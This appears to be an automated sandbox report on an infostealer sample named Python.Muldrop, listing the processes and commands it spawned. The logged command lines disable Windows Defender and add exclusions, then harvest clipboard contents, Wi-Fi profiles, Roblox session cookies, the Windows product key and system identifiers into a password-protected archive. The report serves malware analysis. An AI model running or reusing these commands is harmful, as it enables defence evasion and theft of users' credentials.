Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | ReversingLabs: Detection: 57%
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | String found in binary or memory: id-cmc-addExtensions
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | String found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
